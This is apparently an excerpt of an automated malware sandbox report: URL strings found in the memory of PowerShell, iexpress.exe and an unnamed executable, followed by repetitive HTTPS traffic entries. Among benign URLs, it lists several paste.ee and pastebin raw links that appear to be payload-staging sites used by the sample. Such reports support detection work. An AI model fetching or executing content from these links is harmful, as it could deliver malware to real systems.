                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: edb.log.13.dr, qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 0000000D.00000003.1216551466.0000017B06EE0000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9192A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: iexpress.exe, 0000000C.00000003.1447615394.0000000007F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: powershell.exe, 00000007.00000002.1170496094.0000023510073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D91985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D91593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D91593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235003E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501A60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9067C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/4
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/49ZDOxRT/0
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9067C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/Iheui3WE/0
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9067C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/Iheui3WE/0P
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235016DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501A60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235016B8000.00000004.00000800.00020000.00000000.sdmp, dll01.txt.7.drString found in binary or memory: https://paste.ee/r/eqs49sJc/0
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235016B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/eqs49sJc/0P
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/eqs49sJc/0p
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D904EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.eeXI
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023500222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90592000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D902A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90592000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D902A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/XHtEkzdv
                  Source: powershell.exe, 00000007.00000002.1178028922.000002357A5B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/naAgdcTG
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2231547950.0000000005936000.00000004.10000000.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
